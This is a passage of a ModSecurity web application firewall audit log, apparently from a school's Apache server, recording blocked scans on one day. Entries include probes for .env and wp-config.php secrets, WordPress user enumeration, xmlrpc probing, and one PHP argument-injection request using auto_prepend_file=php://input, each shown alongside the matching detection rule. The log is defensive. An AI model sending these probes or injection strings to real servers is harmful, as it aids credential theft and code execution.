Engine-Mode: "ENABLED"
--f82da129-Z--
--2b122d6e-A--
[24/Apr/2025:01:17:52 +0700] aAku0BuwXEWV6ydgl539xgAAAAI 103.236.140.4 41960 103.236.140.4 8181
--2b122d6e-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.210
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--2b122d6e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b122d6e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745432272239405 743 (- - -)
Stopwatch2: 1745432272239405 743; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b122d6e-Z--
--b0425e56-A--
[24/Apr/2025:03:25:23 +0700] aAlMsz1ahuoJLEjKiAWDaQAAAIU 103.236.140.4 43128 103.236.140.4 8181
--b0425e56-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 138.197.131.145
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 138.197.131.145
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--b0425e56-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b0425e56-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745439923677118 772 (- - -)
Stopwatch2: 1745439923677118 772; combined=354, p1=316, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b0425e56-Z--
--9ccd8002-A--
[24/Apr/2025:03:51:54 +0700] aAlS6t5yz20UX9VrdZP3XgAAAEo 103.236.140.4 49352 103.236.140.4 8181
--9ccd8002-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 85.215.146.7
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 85.215.146.7
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
--9ccd8002-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ccd8002-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745441514617053 945 (- - -)
Stopwatch2: 1745441514617053 945; combined=403, p1=362, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ccd8002-Z--
--5ec73f52-A--
[24/Apr/2025:04:59:35 +0700] aAlix8lQo524fhbIj1ylPwAAAAk 103.236.140.4 34842 103.236.140.4 8181
--5ec73f52-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.217.152
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 164.92.217.152
Accept-Encoding: gzip
X-Varnish: 135976087
--5ec73f52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--5ec73f52-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745445575330353 892 (- - -)
Stopwatch2: 1745445575330353 892; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5ec73f52-Z--
--33c39f11-A--
[24/Apr/2025:05:25:47 +0700] aAlo695yz20UX9VrdZMEoAAAAEI 103.236.140.4 41650 103.236.140.4 8181
--33c39f11-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.195.204
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.195.204
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--33c39f11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33c39f11-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745447147620494 3270 (- - -)
Stopwatch2: 1745447147620494 3270; combined=1423, p1=472, p2=911, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33c39f11-Z--
--0c5ff22e-A--
[24/Apr/2025:05:25:58 +0700] aAlo9t5yz20UX9VrdZMEqgAAAFA 103.236.140.4 41694 103.236.140.4 8181
--0c5ff22e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.195.204
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.195.204
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--0c5ff22e-C--
demo.sayHello
--0c5ff22e-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0c5ff22e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745447158132676 7031 (- - -)
Stopwatch2: 1745447158132676 7031; combined=5028, p1=658, p2=4002, p3=42, p4=42, p5=198, sr=132, sw=86, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0c5ff22e-Z--
--b59f316b-A--
[24/Apr/2025:06:43:50 +0700] aAl7Nt5yz20UX9VrdZMJWQAAAFA 103.236.140.4 59402 103.236.140.4 8181
--b59f316b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
Accept-Charset: utf-8
--b59f316b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b59f316b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745451830442811 926 (- - -)
Stopwatch2: 1745451830442811 926; combined=383, p1=313, p2=0, p3=0, p4=0, p5=70, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b59f316b-Z--
--1938c309-A--
[24/Apr/2025:06:44:16 +0700] aAl7UGLuk3f9kLjsdTbE3gAAAIs 103.236.140.4 59502 103.236.140.4 8181
--1938c309-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36
Accept-Charset: utf-8
--1938c309-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1938c309-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745451856567226 821 (- - -)
Stopwatch2: 1745451856567226 821; combined=353, p1=314, p2=0, p3=0, p4=0, p5=39, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1938c309-Z--
--2e828634-A--
[24/Apr/2025:06:53:22 +0700] aAl9cmLuk3f9kLjsdTbFRgAAAI4 103.236.140.4 33274 103.236.140.4 8181
--2e828634-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 202.104.161.131
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 202.104.161.131
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--2e828634-C--
--2e828634-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e828634-E--
--2e828634-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745452402867613 4501 (- - -)
Stopwatch2: 1745452402867613 4501; combined=3060, p1=455, p2=2573, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e828634-Z--
--4de3cc67-A--
[24/Apr/2025:07:48:59 +0700] aAmKe95yz20UX9VrdZMMtAAAAEc 103.236.140.4 46086 103.236.140.4 8181
--4de3cc67-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.84.16
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.84.16
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--4de3cc67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4de3cc67-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745455739191613 3347 (- - -)
Stopwatch2: 1745455739191613 3347; combined=1427, p1=452, p2=943, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4de3cc67-Z--
--8e869228-A--
[24/Apr/2025:07:49:05 +0700] aAmKgclQo524fhbIj1yvKwAAAAI 103.236.140.4 46110 103.236.140.4 8181
--8e869228-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.84.16
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.84.16
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--8e869228-C--
demo.sayHello
--8e869228-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e869228-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745455745344559 6531 (- - -)
Stopwatch2: 1745455745344559 6531; combined=4719, p1=588, p2=3877, p3=32, p4=35, p5=110, sr=77, sw=77, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e869228-Z--
--2a746331-A--
[24/Apr/2025:08:18:19 +0700] aAmRW95yz20UX9VrdZMOoAAAAEY 103.236.140.4 52782 103.236.140.4 8181
--2a746331-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept-Charset: utf-8
--2a746331-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a746331-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745457499455136 13544 (- - -)
Stopwatch2: 1745457499455136 13544; combined=25904, p1=295, p2=0, p3=0, p4=0, p5=12823, sr=75, sw=0, l=0, gc=12786
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a746331-Z--
--fc73bb18-A--
[24/Apr/2025:08:18:49 +0700] aAmRed5yz20UX9VrdZMOtQAAAFY 103.236.140.4 52896 103.236.140.4 8181
--fc73bb18-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept-Charset: utf-8
--fc73bb18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fc73bb18-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745457529994179 757 (- - -)
Stopwatch2: 1745457529994179 757; combined=337, p1=300, p2=0, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fc73bb18-Z--
--d7bb7c31-A--
[24/Apr/2025:08:33:31 +0700] aAmU68lQo524fhbIj1yxugAAAAU 103.236.140.4 56372 103.236.140.4 8181
--d7bb7c31-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 138.197.131.145
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 138.197.131.145
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--d7bb7c31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d7bb7c31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745458411294163 807 (- - -)
Stopwatch2: 1745458411294163 807; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d7bb7c31-Z--
--4ee6fa74-A--
[24/Apr/2025:09:09:28 +0700] aAmdWGLuk3f9kLjsdTbNowAAAIw 103.236.140.4 37060 103.236.140.4 8181
--4ee6fa74-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.203.244
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.203.244
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--4ee6fa74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4ee6fa74-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745460568861609 2362 (- - -)
Stopwatch2: 1745460568861609 2362; combined=1225, p1=404, p2=792, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4ee6fa74-Z--
--6ee7545a-A--
[24/Apr/2025:09:09:37 +0700] aAmdYclQo524fhbIj1y0EwAAAA8 103.236.140.4 37100 103.236.140.4 8181
--6ee7545a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.203.244
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.203.244
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--6ee7545a-C--
demo.sayHello
--6ee7545a-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ee7545a-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745460577755840 5878 (- - -)
Stopwatch2: 1745460577755840 5878; combined=4443, p1=550, p2=3653, p3=31, p4=35, p5=103, sr=74, sw=71, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ee7545a-Z--
--9d339463-A--
[24/Apr/2025:10:18:40 +0700] aAmtkN5yz20UX9VrdZMT5wAAAE4 103.236.140.4 52728 103.236.140.4 8181
--9d339463-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 172.94.24.98
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 172.94.24.98
X-Forwarded-Proto: https
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
--9d339463-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d339463-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745464720406429 3140 (- - -)
Stopwatch2: 1745464720406429 3140; combined=1526, p1=494, p2=934, p3=0, p4=0, p5=98, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d339463-Z--
--1e2b2020-A--
[24/Apr/2025:10:56:21 +0700] aAm2ZWLuk3f9kLjsdTbTngAAAJE 103.236.140.4 33094 103.236.140.4 8181
--1e2b2020-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--1e2b2020-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e2b2020-H--
